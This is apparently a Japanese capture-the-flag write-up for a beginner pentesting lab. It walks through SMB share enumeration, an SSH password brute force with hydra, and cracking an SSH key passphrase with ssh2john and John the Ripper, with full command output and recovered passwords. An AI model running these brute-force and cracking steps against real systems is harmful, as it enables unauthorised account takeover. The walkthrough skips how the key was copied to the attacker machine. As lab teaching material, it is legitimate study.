2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm
using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
===========================
2018-04-23:strutsのやつをいじってるんだけど、なかなかいい感じだね!寧ろいいかもしれない
をこのサーバーでホストすることもできます。まだ本当のウェブアプリケーションは作っていませんが、その例を試してみました。
を使うと、それがどのように機能するかを披露することができます(しかも、例のRESTバージョンです!)。あ、あと、今、私は
他のバージョンでは問題が発生したため、バージョン2.5.12を使用しています。-K
2018-04-22: SMBが設定されました。-K
2018-04-21:Apacheの設定をしました。後で我々のコンテンツを入れる予定です。-J
For J:
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K
==========================
Jの場合:
私は、/etc/shadowの内容を監査して、弱い認証情報がないことを確認しています、
で、あなたのハッシュを本当に簡単にクラックすることができました。私たちのパスワードポリシーはご存知だと思いますので、以下に従ってください。
ということでしょうか。早急にそのパスワードを変更してください。
-K
smbclient -L 10.10.98.167
Enter WORKGROUP\hacklab's password:
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
smbclient \\\\10.10.98.167\\Anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Apr 19 17:31:20 2018
.. D 0 Thu Apr 19 17:13:06 2018
staff.txt N 173 Thu Apr 19 17:29:55 2018
14318640 blocks of size 1024. 11094536 blocks available
「staff.txt」というファイルがありました。 中身を確認してみます。
smb: \> more staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.98.167
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-17 15:55:11
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.98.167:22/
[STATUS] 156.00 tries/min, 156 tries in 00:01h, 14344245 to do in 1532:31h, 14 active
[STATUS] 122.00 tries/min, 366 tries in 00:03h, 14344035 to do in 1959:35h, 14 active
[STATUS] 102.29 tries/min, 716 tries in 00:07h, 14343685 to do in 2337:12h, 14 active
[22][ssh] host: 10.10.98.167 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-17 16:03:18
janのパスワードが「armando」だということがわかりました。
次いでに、ここも回答しておきましょう。
What service do you use to access the server(answer in abbreviation in all caps)?(サーバーへのアクセスに使用するサービスは何ですか?)
では、sshでターゲットマシンに接続してみます。
ssh jan@10.10.98.167
The authenticity of host '10.10.98.167 (10.10.98.167)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.98.167' (ED25519) to the list of known hosts.
jan@10.10.98.167's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
0 packages can be updated.
0 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Mon Apr 23 15:55:45 2018 from 192.168.56.102
jan@basic2:~$
無事ターゲットマシンに接続できました。
What is the name of the other user you found(all lower case)?(あなたが見つけた他のユーザーの名前は何ですか (すべて小文字)?)
もう一人のユーザーは、おそらく「Kay」ですが、念のため/homeを確認してみます。
cd ../
jan@basic2:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Apr 19 2018 .
drwxr-xr-x 24 root root 4096 Apr 23 2018 ..
drwxr-xr-x 2 root root 4096 Apr 23 2018 jan
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kay
janのほかにkayがいることがわかります。予想通りです。
What is the final password you obtain?(取得した最終パスワードは何ですか?)
kayのパスワードをクラックしてみましょう。 まずは、kayのホームディレクトリに移動します。
jan@basic2:/home$ cd kay
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
┌──(root㉿kali)-[~]
└─# cd .ssh
┌──(root㉿kali)-[~/.ssh]
└─# ll
total 20
-rw------- 1 root root 771 Mar 17 16:15 authorized_keys
-rw-r--r-- 1 root root 3326 Mar 17 16:15 id_rsa
-rw-r--r-- 1 root root 771 Mar 17 16:15 id_rsa.pub
-rw------- 1 root root 364 Mar 17 16:06 known_hosts
-rw-r--r-- 1 root root 142 Mar 17 16:06 known_hosts.old
SSH秘密鍵から解読可能なハッシュを抽出したいので、John The Ripperの「ssh2john.py」を使っていきます。
┌──(root㉿kali)-[~/.ssh]
└─# python3 /usr/share/john/ssh2john.py id_rsa > hash.txt
┌──(root㉿kali)-[~/.ssh]
└─# ll
total 28
-rw------- 1 root root 771 Mar 17 16:15 authorized_keys
-rw-r--r-- 1 root root 4762 Mar 17 16:18 hash.txt
-rw-r--r-- 1 root root 3326 Mar 17 16:15 id_rsa
-rw-r--r-- 1 root root 771 Mar 17 16:15 id_rsa.pub
-rw------- 1 root root 364 Mar 17 16:06 known_hosts
-rw-r--r-- 1 root root 142 Mar 17 16:06 known_hosts.old
このhash.txtでJohn The Ripperを利用して、パスワードをクラックしてみます。
┌──(root㉿kali)-[~/.ssh]
└─# /sbin/john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (id_rsa)
1g 0:00:00:00 DONE (2023-03-17 16:19) 14.28g/s 1181Kp/s 1181Kc/s 1181KC/s behlat..bball40
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
ポチップ
